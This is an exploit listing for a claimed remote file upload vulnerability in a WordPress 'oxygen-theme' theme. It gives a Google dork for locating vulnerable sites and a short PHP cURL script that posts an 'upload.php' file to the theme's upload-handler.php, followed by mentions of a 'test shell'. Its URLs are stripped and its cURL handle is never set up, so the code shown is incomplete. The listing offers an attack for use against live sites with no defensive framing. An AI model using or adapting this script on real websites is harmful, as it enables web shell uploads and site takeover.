##############################################################################
# Exploit Title: WordPress oxygen-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
#
Date
: 12/11/2013
# Vendor Homepage: http:
# Themes Link: http:
# Infected File: upload-handler.php
# Category: webapps
# Google dork:
"/wp-content/themes/oxygen-theme/"
# Tested on : Windows/Linux
##############################################################################
# Exploit
<?php
$uploadfile
=
"upload.php"
;
curl_setopt(
$ch
, CURLOPT_POST, true);
curl_setopt(
$ch
, CURLOPT_POSTFIELDS,
array
(
'orange_themes'
=>
"@$uploadfile"
));
curl_setopt(
$ch
, CURLOPT_RETURNTRANSFER, 1);
$postResult
= curl_exec(
$ch
);
curl_close(
$ch
);
print
"$postResult"
;
?>
http:
_________________________________
All http:
---
test shell
http:
http:
http: